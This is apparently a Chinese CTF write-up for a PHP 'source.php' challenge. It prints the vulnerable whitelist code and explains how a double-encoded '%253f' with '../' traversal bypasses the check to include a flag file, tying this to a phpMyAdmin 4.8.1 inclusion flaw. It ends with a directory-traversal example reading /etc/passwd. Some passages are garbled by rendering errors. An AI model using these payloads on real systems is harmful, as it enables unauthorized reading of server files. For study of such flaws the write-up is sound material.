一.source.php
点开页面,是一个滑稽的表情。当然老规矩,右键审查页面源代码
发现了哥source.php,于是访问一下。
source.php
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
二.hint.php
扫了一眼上面的代码,发现个hint.php
flag not here,and flag in ffffllllaaaagggg,猜测flag应该是在ffffllllaaaagggg 中
三.代码审计
这是个phpmyadmin 4.8.1 远程文件包含漏洞
主体部分:
if (! empty(KaTeX parse error: Expected 'EOF', got '#' at position 20: …UEST['file']) #̲#不能为空 &…_REQUEST[‘file’]) ##是字符串
&& emmm::checkFile($_REQUEST[‘file’]) ##上面checkfile返回为true
) {
include $_REQUEST[‘file’];
exit;
} else {
echo “
<img src=“https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg” />”;
}
- 1.判断传入的file不能为空
- 2.并且是字符串
- 3.checkFile()返回true
满足以上三点才可包含文件
分析 checkfile()函数(重点,核心)
首先是设置了个白名单
第一个if,判断page变量是否为空,是否是字符串
第二个if,判断传入的page是否在白名单中
第三个if,截取page ?之前的字符赋给_page,判断_page是否在白名单中
第四个if,对page进行一次url解码并赋给_page,截取_page ?之前的字符赋给_page,判断_page是否在白名单中,因此需传入二次编码后的内容,就可以使checkfile返回true。
两种payload的情况:
- 不满足第一个if,满足第三个if
- 不满足第一个if,满足第三个if
传入?file=hint.php%253f…/…/…/…/…/…/…/…/ffffllllaaaagggg,因为服务器会自动解一次码,所以 p a g e 的 值 为 h i n t . p h p page的值为hint.php%3f../../../../../../../../ffffllllaaaagggg,又一次url解码后, page的值为hint.php_page的值为hint.php?../…/…/…/…/…/…/…/ffffllllaaaagggg,然后截取问号前面的hint.php判断在白名单里返回true。
满足第二个if即为?file=source.php,? file=hint.php,即访问source.php,hint.php的情况
四.构造payload
payload:
file=hint.php?/../../../../../../../../ffffllllaaaagggg(第一种payload情况) file=hint.php%253f/../../../../../../../../ffffllllaaaagggg
这两个payload都可以,只是返回true的地方不一样
例:
拿下!!!
补充(目录穿越)
漏洞原理:
在Unix操作系统上,../ 是一个标准的返回上一级路径的语法;
在Windows操作系统上, ../ 和 ..\ 都是返回上一级的语句。
若web要显示一个商品的图像,有时候开发者会用通过HTML加载,如:
使用filename参数加载图像文件,图片文件位置可能映射在 /var/www/images/ 上,所以真实的路径是 /var/www/images/214.png
这就导致了攻击者可以读取服务器上的任意文件:
https://www.*****.com/loadImage?filename=…/…/…/etc/passwd
filename的参数值与真实路径组合起来就是:
/var/www/images/…/…/…/etc/passwd
其等价于:
/etc/passwd
详细请见:
大佬的blog